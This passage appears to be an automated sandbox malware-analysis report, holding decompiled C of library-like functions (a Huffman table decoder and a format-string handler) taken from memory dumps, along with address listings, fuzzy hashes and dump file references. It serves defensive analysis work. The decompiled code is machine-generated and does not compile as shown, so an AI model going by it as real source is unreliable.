									_t170 = 4 + _t94 * 4 + _t190;
									__eflags = _t170;
									while(1) {
										__eflags = _t181 -  *_t170;
										if(_t181 <  *_t170) {
											break;
										}
										_t94 = _t94 + 1;
										_t170 = _t170 + 4;
										__eflags = _t94 - 0xf;
										if(_t94 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t201 + 0x10) = _t94;
									goto L27;
								}
								_t171 = 0x10;
								_t185 = _t181 >> _t171 - _t93;
								_t174 = ( *(_t185 + _t190 + 0x88) & 0x000000ff) +  *(_t186 + 4);
								 *_t186 =  *_t186 + (_t174 >> 3);
								 *(_t186 + 4) = _t174 & 0x00000007;
								_t157 =  *(_t190 + 0x488 + _t185 * 2) & 0x0000ffff;
								goto L28;
							}
							_t130 = E00A44DC4(_t187);
							__eflags = _t130;
							if(_t130 == 0) {
								goto L47;
							}
							goto L19;
							L45:
							__eflags = _t140 - 0x194;
						} while (_t140 < 0x194);
						L46:
						 *((char*)(_t187 + 0xe661)) = 1;
						__eflags =  *_t186 -  *((intOrPtr*)(_t187 + 0x84));
						if( *_t186 <=  *((intOrPtr*)(_t187 + 0x84))) {
							_push(0x12b);
							_push(_t187 + 0xa0);
							_push(_t201 + 0x30);
							E00A43797();
							_push(0x3c);
							_push(_t187 + 0xf8c);
							_push(_t201 + 0x15b);
							E00A43797();
							_push(0x11);
							_push(_t187 + 0x1e78);
							_push(_t201 + 0x197);
							E00A43797();
							_push(0x1c);
							_push(_t187 + 0x2d64);
							_push(_t201 + 0x1a8);
							E00A43797();
							E00A50320(_t187 + 0xe4c8, _t201 + 0x2c, 0x194);
							return 1;
						}
						goto L47;
					}
					 *((intOrPtr*)(_t187 + 0xe65c)) = 1;
					return E00A42F75(_t179, _t205, _t187, _t187 + 0xe4c4);
				} else {
					L47:
					return 0;
				}
			}

0x00a44088
0x00a44091
0x00a4409a
0x00a440a2
0x00a440bc
0x00a440c3
0x00a440c8
0x00a440cd
0x00a440f1
0x00a440f3
0x00a440f9
0x00a440ff
0x00a44105
0x00a4410a
0x00a44119
0x00a4411e
0x00a4411e
0x00a44125
0x00a4412a
0x00a44138
0x00a4413c
0x00a44141
0x00a44145
0x00a44147
0x00a44180
0x00000000
0x00a44180
0x00a44157
0x00a4415a
0x00a4415f
0x00a44161
0x00a4416a
0x00a4416a
0x00a4416d
0x00a4416d
0x00a4416e
0x00a44171
0x00000000
0x00000000
0x00a44173
0x00a44178
0x00a44179
0x00a4417b
0x00000000
0x00000000
0x00000000
0x00a4417b
0x00a4417d
0x00000000
0x00a4417d
0x00a44163
0x00a44184
0x00a44184
0x00a44185
0x00a44185
0x00a4418a
0x00a4418c
0x00a44194
0x00a44199
0x00a4419a
0x00a4419f
0x00a4419f
0x00a441a1
0x00a441aa
0x00a441ac
0x00a441bd
0x00a441bf
0x00a441c6
0x00a441cc
0x00a441d2
0x00a441d6
0x00a44203
0x00a44204
0x00a44205
0x00a44209
0x00a4420b
0x00a44229
0x00a4422c
0x00a44238
0x00a4423a
0x00a4423e
0x00a44243
0x00a44250
0x00a44252
0x00a44255
0x00a44257
0x00a44257
0x00a44259
0x00a44261
0x00a44263
0x00a44264
0x00a44267
0x00a44280
0x00a44281
0x00a44284
0x00a442d2
0x00a442d4
0x00a442f1
0x00a442f1
0x00a442f4
0x00a442d6
0x00a442e0
0x00a442e3
0x00a442e3
0x00a442f6
0x00a442fa
0x00a442ff
0x00a442ff
0x00a44300
0x00a44306
0x00000000
0x00000000
0x00a44308
0x00a4430d
0x00a4430e
0x00a44310
0x00000000
0x00000000
0x00a44312
0x00a44312
0x00000000
0x00a44312
0x00000000
0x00a442ff
0x00a44286
0x00a44289
0x00a4428b
0x00a442a8
0x00a442a8
0x00a442ab
0x00a4428d
0x00a44297
0x00a4429a
0x00a4429a
0x00a442ad
0x00a442b1
0x00a442b6
0x00a442b8
0x00000000
0x00a442ba
0x00a442ba
0x00a442ba
0x00a442bb
0x00a442c1
0x00000000
0x00000000
0x00a442c7
0x00a442cb
0x00a442cc
0x00a442ce
0x00000000
0x00000000
0x00000000
0x00a442d0
0x00000000
0x00a442ba
0x00a442b8
0x00a44274
0x00a44278
0x00000000
0x00a44278
0x00a44214
0x00a44214
0x00a44216
0x00a44216
0x00a44218
0x00000000
0x00000000
0x00a4421a
0x00a4421b
0x00a4421e
0x00a44221
0x00000000
0x00000000
0x00000000
0x00a44223
0x00a44225
0x00000000
0x00a44225
0x00a441da
0x00a441dd
0x00a441e7
0x00a441ef
0x00a441f4
0x00a441f7
0x00000000
0x00a441f7
0x00a441b0
0x00a441b5
0x00a441b7
0x00000000
0x00000000
0x00000000
0x00a44318
0x00a44318
0x00a44318
0x00a44324
0x00a44326
0x00a4432d
0x00a44333
0x00a44339
0x00a44346
0x00a4434b
0x00a4434c
0x00a44351
0x00a4435b
0x00a44363
0x00a44364
0x00a44369
0x00a44373
0x00a4437b
0x00a4437c
0x00a44381
0x00a4438b
0x00a44393
0x00a44394
0x00a443aa
0x00000000
0x00a443b2
0x00000000
0x00a44333
0x00a440d5
0x00000000
0x00a44335
0x00a44335
0x00000000
0x00a44335

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
Instruction ID: bc89f9e80a4af0817ddfd980e9cfad1e4d0e28fd87337d951b868ab7a753846e
Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
Instruction Fuzzy Hash: 359156B52003498BDB24EF68D991BFA77D5EBE8300F10092DFA968B282DA74A545C752

Uniqueness

Uniqueness Score: -1.00%

Function 00A443BF Relevance: .2, Instructions: 243
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00A443BF(void* __ecx) {
				signed int _t70;
				signed int _t71;
				signed int _t72;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				void* _t79;
				char _t90;
				signed int _t94;
				void* _t97;
				signed int _t108;
				unsigned int _t112;
				intOrPtr* _t114;
				signed int _t117;
				intOrPtr _t118;
				signed int _t124;
				signed int _t127;
				signed int _t128;
				signed int _t134;
				signed int _t136;
				void* _t138;
				signed int _t141;
				void* _t142;
				intOrPtr* _t143;
				void* _t147;
				intOrPtr* _t153;
				intOrPtr* _t156;
				void* _t157;
				signed int _t160;
				unsigned int _t165;
				void* _t168;
				signed int _t169;
				signed int _t171;
				signed int _t172;
				intOrPtr* _t175;
				void* _t177;
				void* _t178;

				_t177 = __ecx;
				if( *((char*)( *((intOrPtr*)(_t178 + 8)) + 0x11)) != 0) {
					_t175 =  *((intOrPtr*)(_t178 + 0x1dc));
					__eflags =  *((char*)(_t175 + 8));
					if( *((char*)(_t175 + 8)) != 0) {
						L5:
						_t171 = 0;
						__eflags = 0;
						do {
							_t112 = E00A3A898(_t175) >> 0xc;
							E00A3A881(_t175, 4);
							__eflags = _t112 - 0xf;
							if(_t112 != 0xf) {
								 *(_t178 + _t171 + 0x18) = _t112;
								goto L14;
							}
							_t127 = E00A3A898(_t175) >> 0x0000000c & 0x000000ff;
							E00A3A881(_t175, 4);
							__eflags = _t127;
							if(_t127 != 0) {
								_t128 = _t127 + 2;
								__eflags = _t128;
								while(1) {
									_t128 = _t128 - 1;
									__eflags = _t171 - 0x14;
									if(_t171 >= 0x14) {
										break;
									}
									 *(_t178 + _t171 + 0x18) = 0;
									_t171 = _t171 + 1;
									__eflags = _t128;
									if(_t128 != 0) {
										continue;
									}
									break;
								}
								_t171 = _t171 - 1;
								goto L14;
							}
							 *(_t178 + _t171 + 0x18) = 0xf;
							L14:
							_t171 = _t171 + 1;
							__eflags = _t171 - 0x14;
						} while (_t171 < 0x14);
						_push(0x14);
						_t114 =  *((intOrPtr*)(_t178 + 0x1e8)) + 0x3bb0;
						_push(_t114);
						_push(_t178 + 0x18);
						 *((intOrPtr*)(_t178 + 0x20)) = _t114;
						E00A43797();
						_t172 = 0;
						__eflags = 0;
						do {
							__eflags =  *((char*)(_t175 + 8));
							if( *((char*)(_t175 + 8)) != 0) {
								L19:
								_t70 = E00A3A89D(_t175);
								_t71 =  *(_t114 + 0x84);
								_t165 = _t70 & 0x0000fffe;
								__eflags = _t165 -  *((intOrPtr*)(_t114 + 4 + _t71 * 4));
								if(_t165 >=  *((intOrPtr*)(_t114 + 4 + _t71 * 4))) {
									_t134 = 0xf;
									_t72 = _t71 + 1;
									 *(_t178 + 0x10) = _t134;
									__eflags = _t72 - _t134;
									if(_t72 >= _t134) {
										L27:
										_t136 =  *(_t175 + 4) +  *(_t178 + 0x10);
										 *_t175 =  *_t175 + (_t136 >> 3);
										_t75 =  *(_t178 + 0x10);
										 *(_t175 + 4) = _t136 & 0x00000007;
										_t138 = 0x10;
										_t141 =  *((intOrPtr*)(_t114 + 0x44 + _t75 * 4)) + (_t165 -  *((intOrPtr*)(_t114 + _t75 * 4)) >> _t138 - _t75);
										__eflags = _t141 -  *_t114;
										asm("sbb eax, eax");
										_t76 = _t75 & _t141;
										__eflags = _t76;
										_t77 =  *(_t114 + 0xc88 + _t76 * 2) & 0x0000ffff;
										L28:
										_t142 = 0x10;
										__eflags = _t77 - _t142;
										if(_t77 >= _t142) {
											_t168 = 0x12;
											__eflags = _t77 - _t168;
											if(__eflags >= 0) {
												_t143 = _t175;
												if(__eflags != 0) {
													_t117 = (E00A3A898(_t143) >> 9) + 0xb;
													__eflags = _t117;
													_push(7);
												} else {
													_t117 = (E00A3A898(_t143) >> 0xd) + 3;
													_push(3);
												}
												_pop(_t79);
												E00A3A881(_t175, _t79);
												while(1) {
													_t117 = _t117 - 1;
													__eflags = _t172 - 0x1ae;
													if(_t172 >= 0x1ae) {
														goto L46;
													}
													 *(_t178 + _t172 + 0x2c) = 0;
													_t172 = _t172 + 1;
													__eflags = _t117;
													if(_t117 != 0) {
														continue;
													}
													L44:
													_t114 =  *((intOrPtr*)(_t178 + 0x14));
													goto L45;
												}
												break;
											}
											__eflags = _t77 - _t142;
											_t153 = _t175;
											if(_t77 != _t142) {
												_t124 = (E00A3A898(_t153) >> 9) + 0xb;
												__eflags = _t124;
												_push(7);
											} else {
												_t124 = (E00A3A898(_t153) >> 0xd) + 3;
												_push(3);
											}
											_pop(_t97);
											E00A3A881(_t175, _t97);
											__eflags = _t172;
											if(_t172 == 0) {
												L48:
												_t90 = 0;
												L50:
												return _t90;
											} else {
												while(1) {
													_t124 = _t124 - 1;
													__eflags = _t172 - 0x1ae;
													if(_t172 >= 0x1ae) {
														goto L46;
													}
													 *(_t178 + _t172 + 0x2c) =  *((intOrPtr*)(_t178 + _t172 + 0x2b));
													_t172 = _t172 + 1;
													__eflags = _t124;
													if(_t124 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t178 + _t172 + 0x2c) = _t77;
										_t172 = _t172 + 1;
										goto L45;
									}
									_t156 = _t114 + (_t72 + 1) * 4;
									while(1) {
										__eflags = _t165 -  *_t156;
										if(_t165 <  *_t156) {
											break;
										}
										_t72 = _t72 + 1;
										_t156 = _t156 + 4;
										__eflags = _t72 - 0xf;
										if(_t72 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t178 + 0x10) = _t72;
									goto L27;
								}
								_t157 = 0x10;
								_t169 = _t165 >> _t157 - _t71;
								_t160 = ( *(_t169 + _t114 + 0x88) & 0x000000ff) +  *(_t175 + 4);
								 *_t175 =  *_t175 + (_t160 >> 3);
								 *(_t175 + 4) = _t160 & 0x00000007;
								_t77 =  *(_t114 + 0x488 + _t169 * 2) & 0x0000ffff;
								goto L28;
							}
							__eflags =  *_t175 -  *((intOrPtr*)(_t177 + 0x84)) - 5;
							if( *_t175 <=  *((intOrPtr*)(_t177 + 0x84)) - 5) {
								goto L19;
							}
							_t94 = E00A44E52(_t177);
							__eflags = _t94;
							if(_t94 == 0) {
								goto L48;
							}
							goto L19;
							L45:
							__eflags = _t172 - 0x1ae;
						} while (_t172 < 0x1ae);
						L46:
						 *((char*)(_t177 + 0xe662)) = 1;
						__eflags =  *((char*)(_t175 + 8));
						if( *((char*)(_t175 + 8)) != 0) {
							L49:
							_t118 =  *((intOrPtr*)(_t178 + 0x1e8));
							_push(0x132);
							_push(_t118);
							_push(_t178 + 0x2c);
							E00A43797();
							_push(0x40);
							_push(_t118 + 0xeec);
							_push(_t178 + 0x166);
							E00A43797();
							_t147 = 0x10;
							_push(_t147);
							_push(_t118 + 0x1dd8);
							_push(_t178 + 0x1a6);
							E00A43797();
							_push(0x2c);
							_push(_t118 + 0x2cc4);
							_push(_t178 + 0x1b6);
							E00A43797();
							_t90 = 1;
							goto L50;
						}
						__eflags =  *_t175 -  *((intOrPtr*)(_t177 + 0x84));
						if( *_t175 <=  *((intOrPtr*)(_t177 + 0x84))) {
							goto L49;
						}
						goto L48;
					}
					__eflags =  *_t175 -  *((intOrPtr*)(__ecx + 0x84)) - 0x19;
					if( *_t175 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
						goto L5;
					}
					_t108 = E00A44E52(__ecx);
					__eflags = _t108;
					if(_t108 == 0) {
						goto L48;
					}
					goto L5;
				}
				return 1;
			}

0x00a443ce
0x00a443d0
0x00a443db
0x00a443e3
0x00a443e7
0x00a44403
0x00a44403
0x00a44403
0x00a44405
0x00a44412
0x00a44415
0x00a4441a
0x00a4441d
0x00a44456
0x00000000
0x00a44456
0x00a4442d
0x00a44430
0x00a44435
0x00a44437
0x00a44440
0x00a44440
0x00a44443
0x00a44443
0x00a44444
0x00a44447
0x00000000
0x00000000
0x00a44449
0x00a4444e
0x00a4444f
0x00a44451
0x00000000
0x00000000
0x00000000
0x00a44451
0x00a44453
0x00000000
0x00a44453
0x00a44439
0x00a4445a
0x00a4445a
0x00a4445b
0x00a4445b
0x00a4446b
0x00a4446d
0x00a44475
0x00a44476
0x00a44477
0x00a4447b
0x00a44480
0x00a44480
0x00a44482
0x00a44482
0x00a44486
0x00a444a4
0x00a444a6
0x00a444ad
0x00a444b3
0x00a444b9
0x00a444bd
0x00a444ea
0x00a444eb
0x00a444ec
0x00a444f0
0x00a444f2
0x00a4450d
0x00a44510
0x00a4451c
0x00a4451e
0x00a44522
0x00a44527
0x00a44533
0x00a44535
0x00a44537
0x00a44539
0x00a44539
0x00a4453b
0x00a44543
0x00a44545
0x00a44546
0x00a44549
0x00a44557
0x00a44558
0x00a4455b
0x00a445a9
0x00a445ab
0x00a445c8
0x00a445c8
0x00a445cb
0x00a445ad
0x00a445b7
0x00a445ba
0x00a445ba
0x00a445cd
0x00a445d1
0x00a445d6
0x00a445d6
0x00a445d7
0x00a445dd
0x00000000
0x00000000
0x00a445df
0x00a445e4
0x00a445e5
0x00a445e7
0x00000000
0x00000000
0x00a445e9
0x00a445e9
0x00000000
0x00a445e9
0x00000000
0x00a445d6
0x00a4455d
0x00a44560
0x00a44562
0x00a4457f
0x00a4457f
0x00a44582
0x00a44564
0x00a4456e
0x00a44571
0x00a44571
0x00a44584
0x00a44588
0x00a4458d
0x00a4458f
0x00a44610
0x00a44610
0x00a44679
0x00000000
0x00a44591
0x00a44591
0x00a44591
0x00a44592
0x00a44598
0x00000000
0x00000000
0x00a4459e
0x00a445a2
0x00a445a3
0x00a445a5
0x00000000
0x00000000
0x00000000
0x00a445a7
0x00000000
0x00a44591
0x00a4458f
0x00a4454b
0x00a4454f
0x00000000
0x00a4454f
0x00a444f7
0x00a444fa
0x00a444fa
0x00a444fc
0x00000000
0x00000000
0x00a444fe
0x00a444ff
0x00a44502
0x00a44505
0x00000000
0x00000000
0x00000000
0x00a44507
0x00a44509
0x00000000
0x00a44509
0x00a444c1
0x00a444c4
0x00a444ce
0x00a444d6
0x00a444db
0x00a444de
0x00000000
0x00a444de
0x00a44491
0x00a44493
0x00000000
0x00000000
0x00a44497
0x00a4449c
0x00a4449e
0x00000000
0x00000000
0x00000000
0x00a445ed
0x00a445ed
0x00a445ed
0x00a445f9
0x00a445f9
0x00a44600
0x00a44604
0x00a44614
0x00a44614
0x00a4461f
0x00a44624
0x00a44625
0x00a44628
0x00a4462d
0x00a44637
0x00a4463f
0x00a44640
0x00a44647
0x00a44648
0x00a44651
0x00a44659
0x00a4465a
0x00a4465f
0x00a44667
0x00a4466f
0x00a44672
0x00a44677
0x00000000
0x00a44677
0x00a44608
0x00a4460e
0x00000000
0x00000000
0x00000000
0x00a4460e
0x00a443f2
0x00a443f4
0x00000000
0x00000000
0x00a443f6
0x00a443fb
0x00a443fd
0x00000000
0x00000000
0x00000000
0x00a443fd
0x00000000

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: 418e818e3ea00f8a03aa2915ff6b71154c2355b9dea16ede775df94a97e00512
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: 708148B53043464FEF24DF68C9D1BBD77D4ABE9304F00492DFAC68B282DA7089858752

Uniqueness

Uniqueness Score: -1.00%

Function 00A551C9 Relevance: .2, Instructions: 237
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 84%

			E00A551C9(void* __ecx, void* __edi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __esi;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed int _t57;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t101;
				void* _t103;
				signed int _t109;
				unsigned int _t111;
				signed char _t113;
				unsigned int _t121;
				void* _t122;
				signed int _t123;
				short _t124;
				void* _t127;
				void* _t128;
				void* _t129;
				signed int _t130;
				void* _t131;
				void* _t133;
				void* _t134;

				_t122 = __edi;
				_t52 =  *0xa6e7ac; // 0xa7a040ce
				_v8 = _t52 ^ _t130;
				_t129 = __ecx;
				_t101 = 0;
				_t121 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t103 = 0x58;
				_t133 = _t54 - 0x64;
				if(_t133 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E00A55BFB(_t129);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t129 + 0x30)) - _t101;
								if( *((intOrPtr*)(_t129 + 0x30)) != _t101) {
									L71:
									_t57 = 1;
									L72:
									return E00A4FBBC(_t57, _t101, _v8 ^ _t130, _t121, _t122, _t129);
								}
								_t121 =  *(_t129 + 0x20);
								_push(_t122);
								_v16 = _t101;
								_t60 = _t121 >> 4;
								_v12 = _t101;
								_t123 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t109 =  *(_t129 + 0x32) & 0x0000ffff;
									__eflags = _t109 - 0x78;
									if(_t109 == 0x78) {
										L48:
										_t62 = _t121 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t109 - 0x61;
											if(_t109 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t124 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t130 + _t101 * 2 - 0xc)) = _t124;
													__eflags = _t109 - _t65;
													if(_t109 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
														 *((short*)(_t130 + _t101 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t101 = _t101 + 2;
														__eflags = _t101;
														L62:
														_t127 =  *((intOrPtr*)(_t129 + 0x24)) -  *((intOrPtr*)(_t129 + 0x38)) - _t101;
														__eflags = _t121 & 0x0000000c;
														if((_t121 & 0x0000000c) == 0) {
															E00A54490(_t129 + 0x448, 0x20, _t127, _t129 + 0x18);
															_t131 = _t131 + 0x10;
														}
														E00A55F16(_t129 + 0x448,  &_v16, _t101, _t129 + 0x18,  *((intOrPtr*)(_t129 + 0xc)));
														_t111 =  *(_t129 + 0x20);
														_t101 = _t129 + 0x18;
														_t75 = _t111 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t113 = _t111 >> 2;
															__eflags = _t113 & 0x00000001;
															if((_t113 & 0x00000001) == 0) {
																E00A54490(_t129 + 0x448, 0x30, _t127, _t101);
																_t131 = _t131 + 0x10;
															}
														}
														E00A55DF8(_t129, 0);
														__eflags =  *_t101;
														if( *_t101 >= 0) {
															_t78 =  *(_t129 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E00A54490(_t129 + 0x448, 0x20, _t127, _t101);
															}
														}
														_pop(_t122);
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t109 - _t86;
													if(_t109 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t128 = 0x41;
											__eflags = _t109 - _t128;
											if(_t109 == _t128) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t109 - _t88;
									if(_t109 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t121 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t121;
									if((1 & _t121) == 0) {
										_t92 = _t121 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t123;
										L45:
										_t101 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							_t57 = 0;
							goto L72;
						}
						_t95 = _t55;
						__eflags = _t95;
						if(__eflags == 0) {
							L28:
							_push(_t101);
							_push(0xa);
							L29:
							_t56 = E00A55993(_t129, _t122, __eflags);
							goto L10;
						}
						__eflags = _t95 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E00A55B70(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E00A556F9(_t101, _t129);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t129 + 0x20;
						 *_t3 =  *(_t129 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E00A55ADD(__ecx, _t121);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E00A55B51(__ecx);
					goto L10;
				}
				if(_t133 == 0) {
					goto L27;
				}
				_t134 = _t54 - _t103;
				if(_t134 > 0) {
					_t97 = _t54 - 0x5a;
					__eflags = _t97;
					if(_t97 == 0) {
						_t56 = E00A5553C(__ecx);
						goto L10;
					}
					_t98 = _t97 - 7;
					__eflags = _t98;
					if(_t98 == 0) {
						goto L30;
					}
					__eflags = _t98;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E00A558FB(_t129, __eflags, _t101);
					goto L10;
				}
				if(_t134 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t121) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x00a551c9
0x00a551d1
0x00a551d8
0x00a551dd
0x00a551df
0x00a551e3
0x00a551e6
0x00a551ea
0x00a551eb
0x00a551ee
0x00a5525b
0x00a5525e
0x00a552ad
0x00a552ad
0x00a552b0
0x00a5521c
0x00a5521e
0x00a55223
0x00a55225
0x00a552cb
0x00a552ce
0x00a55414
0x00a55414
0x00a55416
0x00a55425
0x00a55425
0x00a552d4
0x00a552d9
0x00a552dc
0x00a552df
0x00a552e3
0x00a552e9
0x00a552ea
0x00a552ec
0x00a55316
0x00a55316
0x00a5531a
0x00a5531d
0x00a55327
0x00a55329
0x00a5532c
0x00a5532e
0x00a55334
0x00a55334
0x00a55336
0x00a55336
0x00a55339
0x00a55347
0x00a55347
0x00a55349
0x00a5534b
0x00a5534c
0x00a5534e
0x00a55354
0x00a55356
0x00a55357
0x00a5535c
0x00a5535f
0x00a5536d
0x00a5536d
0x00a5536f
0x00a5536f
0x00a5537a
0x00a5537c
0x00a55381
0x00a55381
0x00a55384
0x00a5538a
0x00a5538c
0x00a5538f
0x00a5539f
0x00a553a4
0x00a553a4
0x00a553b9
0x00a553be
0x00a553c1
0x00a553c6
0x00a553c9
0x00a553cb
0x00a553cd
0x00a553d0
0x00a553d3
0x00a553e0
0x00a553e5
0x00a553e5
0x00a553d3
0x00a553ec
0x00a553f1
0x00a553f4
0x00a553f9
0x00a553fc
0x00a553fe
0x00a5540b
0x00a55410
0x00a553fe
0x00a55413
0x00000000
0x00a55413
0x00a55363
0x00a55364
0x00a55367
0x00000000
0x00000000
0x00a55369
0x00000000
0x00a55369
0x00a55350
0x00a55352
0x00000000
0x00000000
0x00000000
0x00a55352
0x00a5533d
0x00a5533e
0x00a55341
0x00000000
0x00000000
0x00a55343
0x00000000
0x00a55343
0x00000000
0x00a55330
0x00a55321
0x00a55322
0x00a55325
0x00000000
0x00000000
0x00000000
0x00a55325
0x00a552f0
0x00a552f3
0x00a552f5
0x00a55300
0x00a55302
0x00a5530a
0x00a5530c
0x00a5530e
0x00000000
0x00000000
0x00a55310
0x00a55314
0x00a55314
0x00000000
0x00a55314
0x00a55304
0x00a552f9
0x00a552f9
0x00a552fa
0x00000000
0x00a552fa
0x00a552f7
0x00000000
0x00a552f7
0x00a5522b
0x00a5522b
0x00000000
0x00a5522b
0x00a552b7
0x00a552b7
0x00a552ba
0x00a5528c
0x00a5528c
0x00a5528d
0x00a5528f
0x00a55291
0x00000000
0x00a55291
0x00a552bc
0x00a552bf
0x00000000
0x00000000
0x00a552c5
0x00a55234
0x00a55234
0x00000000
0x00a55234
0x00a55260
0x00a552a3
0x00000000
0x00a552a3
0x00a55262
0x00a55265
0x00a55298
0x00a5529a
0x00000000
0x00a5529a
0x00a55267
0x00a5526a
0x00a55288
0x00a55288
0x00a55288
0x00a55288
0x00000000
0x00a55288
0x00a5526c
0x00a5526f
0x00a55281
0x00000000
0x00a55281
0x00a55271
0x00a55274
0x00000000
0x00000000
0x00a55278
0x00000000
0x00a55278
0x00a551f0
0x00000000
0x00000000
0x00a551f6
0x00a551f8
0x00a55238
0x00a55238
0x00a5523b
0x00a55254
0x00000000
0x00a55254
0x00a5523d
0x00a5523d
0x00a55240
0x00000000
0x00000000
0x00a55243
0x00a55246
0x00000000
0x00000000
0x00a55248
0x00a5524b
0x00000000
0x00a5524b
0x00a551fa
0x00a55232
0x00000000
0x00a55232
0x00a551fe
0x00000000
0x00000000
0x00a55207
0x00000000
0x00000000
0x00a5520c
0x00000000
0x00000000
0x00a55211
0x00000000
0x00000000
0x00a5521a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
